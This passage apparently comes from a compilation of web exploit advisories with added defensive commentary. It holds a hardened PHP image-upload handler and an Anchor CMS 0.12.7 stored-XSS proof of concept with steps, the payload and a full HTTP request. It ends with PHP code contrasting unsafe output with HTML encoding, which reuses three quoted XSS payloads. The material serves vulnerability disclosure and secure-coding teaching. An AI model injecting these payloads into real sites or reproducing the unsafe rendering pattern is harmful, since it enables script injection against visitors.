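    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // 1. Only the LAST extension counts and it must be on the allow list.
    //    "Blank.jpg.php" has the extension "php" and is rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 2. Ignore the client's Content-Type header; sniff the bytes that actually arrived.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // 3. The payload must decode as an image; "<?php system(...)" does not.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // 4. Discard the client-supplied name entirely and generate our own.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $name;
}

// Serve stored images through this script rather than from a web-exposed directory,
// with a fixed Content-Type, so nothing in UPLOAD_DIR is ever handed to the PHP engine.
function serve_image(string $name): void {
    if (!preg_match('/^[a-f0-9]{32}\.(jpe?g|png|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . ALLOWED[pathinfo($name, PATHINFO_EXTENSION)]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

if (isset($_FILES['img'])) {
    try {
        echo store_image($_FILES['img']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected: ', $e->getMessage();
    }
}
```

Steps 1 to 3 each close one of the gaps the two exploits use; step 4 plus serving through `serve_image()` means that even a file that slipped past all checks is never resolved as a PHP script. If the upload directory must stay under the web root, the equivalent server-side control is to disable the PHP handler for that directory (for Apache, `php_admin_flag engine off` or a `<FilesMatch>` deny for `.php` inside it).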
  25. # Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://anchorcms.com/
# Version: 0.12.7
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following URL: http://(HOST)/admin/
2- Log in to the admin panel.
3- Press the "Posts" button.
4- Write the XSS payload into the description of the post.
5- Press the "Save" button.
6- Go to the post.

XSS Payload ==> "><script>alert("XSS")</script>

==> HTTP Request <==

POST /admin/posts/edit/1 HTTP/1.1
Host: (HOST)
Content-Length: 262
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://(HOST)/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://(HOST)/admin/posts/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: anchorcms=21cdfqefqwefl69ij8231
Connection: close

token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10&description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
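The three stored XSS posts above (Flatpress `content`, the Visitor Management `comment` that is later placed in a `data-content` attribute, and the Anchor CMS `description`) share one root cause: text saved from a form is later written into HTML without encoding for the context it lands in. The following is an added example, not code from any of those projects, showing the unsafe pattern beside the fix; the function and field names are assumptions, and the sample inputs are the payloads quoted in the posts.

```php
<?php
// Added example, not code from Flatpress, the Visitor Management System or Anchor CMS:
// a stored value rendered back into HTML, first unsafely, then encoded for its context.
// Function names are assumptions; the sample inputs are the payloads from the posts above.

// Unsafe: the stored value is echoed straight into the page, so an <img onerror=...>
// or <script> saved earlier runs in every visitor's browser.
function render_comment_unsafe(string $comment): string {
    return "<p class=\"comment\">" . $comment . "</p>";
}

// Encode on output. ENT_QUOTES covers element content and both single- and
// double-quoted attribute values; ENT_SUBSTITUTE avoids returning "" on bad UTF-8.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Safe element content: the Flatpress and Anchor CMS cases.
function render_comment_safe(string $comment): string {
    return "<p class=\"comment\">" . h($comment) . "</p>";
}

// Safe attribute content: the Visitor Management listing put the stored text into a
// data-content attribute; with ENT_QUOTES a quote in the input cannot end the attribute.
function render_visitor_link_safe(string $rid, string $details): string {
    return '<a href="front.php?rid=' . urlencode($rid) . '" data-content="' . h($details) . '">View</a>';
}

// Defence in depth: a policy without 'unsafe-inline' stops inline event handlers and
// inline <script> blocks from running even where an encoding step was missed.
function send_security_headers(): void {
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
    header("X-Content-Type-Options: nosniff");
}

// Constructed sample inputs, taken from the payloads quoted in the posts.
$payloads = [
    '<img src=x onerror=\'alert("TEST XSS")\'/>',   // Flatpress content field
    '<script>alert("xss")</script>',               // Visitor Management comment field
    '"><script>alert("XSS")</script>',             // Anchor CMS description field
];

foreach ($payloads as $p) {
    echo render_comment_safe($p), "\n";
}
echo render_visitor_link_safe('42', 'd3crypt:9876543210:stored xss:' . $payloads[1]), "\n";
```

Encoding belongs at the point of output, not at the point of storage: the same stored value may be rendered into element content, an attribute, a JavaScript string or a URL, and each needs its own encoding. Rejecting `<` on input (as a validation step) is a useful extra control but does not replace output encoding, since the Anchor CMS payload shows a quote, not a tag, doing the damage in attribute context.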